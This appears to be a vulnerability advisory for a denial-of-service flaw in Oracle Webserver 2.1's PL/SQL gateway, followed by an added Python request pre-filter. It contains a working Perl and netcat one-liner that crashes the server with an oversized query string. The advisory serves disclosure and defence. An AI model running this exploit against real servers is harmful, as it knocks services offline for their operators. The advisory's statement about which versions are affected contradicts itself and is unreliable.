Vulnerability
Oracle Webserver
Affected
Systems running Oracle Webserver 2.1 with PL/SQL stored procedures
Description
This is a DoS attack against an Oracle Webserver 2.1 that serves
PL/SQL stored procedures. The server dumps quietly; Simon
Josefsson, who reported this, hasn't found anything in the logs.
v2.0 does not seem to exhibit this behaviour (v2.1 is the latest,
but many sites seem to still run v2.0). PL/SQL is, simply put, a
scripting language within the Oracle database.
---
#!/bin/sh
#
# requires Perl and NetCat.
#
# usage:
# prg <host> <port> <path>
#
# example:
# # ./prg your.own.domain.com 80 /ows-bin
#
# if you have the PL/SQL stored procedure in /ows-bin/.
#
# Sends a single GET for <path>/fnord with a 2600-character query string
# and pipes it to the server with nc. Arguments are quoted so that a path
# or host containing shell metacharacters is passed through unchanged.
perl -e 'print "GET $ARGV[0]/fnord?foo=", "a" x 2600, " HTTP/1.0\n\n\n\n";' "$3" | nc "$1" "$2"
Solution
Nothing yet. v2.0 and after does not seem to be affected by
this. The old Oracle Webserver 1.0.2.0.2 cannot be attacked this
way. There seem to be hard limits of 32 lines per HTTP request, 1540
chars on the GET/HEAD statement and 4096 chars on every additional
header line.
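Until a fix is available, the limits named above can be enforced in front of the server. The following is an added example, not part of the advisory: a request pre-filter that rejects requests exceeding the stated line and length limits and, for the PL/SQL gateway path, any query string over an assumed tighter cap. The gateway path /ows-bin is taken from the usage example; the 1024-character query cap and the sample requests are assumptions constructed for illustration.

```python
# Added example (not the advisory's code): pre-filter for requests bound for
# the Oracle Webserver PL/SQL gateway, enforcing the limits the advisory lists.

MAX_LINES = 32            # hard limit on lines per HTTP request (from the advisory)
MAX_REQUEST_LINE = 1540   # hard limit on the GET/HEAD statement (from the advisory)
MAX_HEADER_LINE = 4096    # hard limit on every additional header line (from the advisory)
GATEWAY_PREFIX = "/ows-bin"   # PL/SQL gateway path; assumed, taken from the usage example
MAX_GATEWAY_QUERY = 1024      # assumed tighter cap for query strings sent to the gateway


def check_request(raw: bytes) -> list:
    """Return the reasons a raw HTTP request should be rejected (empty list = accept)."""
    reasons = []
    # Decode bytes losslessly and keep only the header block (up to the first blank line).
    text = raw.decode("latin-1").replace("\r\n", "\n")
    head = text.split("\n\n", 1)[0]
    lines = head.split("\n")

    if len(lines) > MAX_LINES:
        reasons.append(f"too many request lines ({len(lines)} > {MAX_LINES})")

    request_line = lines[0]
    if len(request_line) > MAX_REQUEST_LINE:
        reasons.append(f"request line too long ({len(request_line)} > {MAX_REQUEST_LINE})")

    for number, header in enumerate(lines[1:], start=2):
        if len(header) > MAX_HEADER_LINE:
            reasons.append(f"header line {number} too long ({len(header)} > {MAX_HEADER_LINE})")

    # Oversized query strings aimed at the PL/SQL gateway are what the advisory describes.
    parts = request_line.split(" ")
    if len(parts) >= 2:
        path, _, query = parts[1].partition("?")
        if path.startswith(GATEWAY_PREFIX) and len(query) > MAX_GATEWAY_QUERY:
            reasons.append(f"gateway query string too long ({len(query)} > {MAX_GATEWAY_QUERY})")
    return reasons


# Constructed samples: one mirroring the advisory's 2600-character request, one ordinary.
SAMPLE_ATTACK = ("GET /ows-bin/fnord?foo=" + "a" * 2600 + " HTTP/1.0\n\n\n\n").encode()
SAMPLE_NORMAL = b"GET /ows-bin/owa/report?dept=10 HTTP/1.0\r\nHost: example.invalid\r\n\r\n"

if __name__ == "__main__":
    for name, sample in (("attack", SAMPLE_ATTACK), ("normal", SAMPLE_NORMAL)):
        print(name, check_request(sample) or "accepted")
```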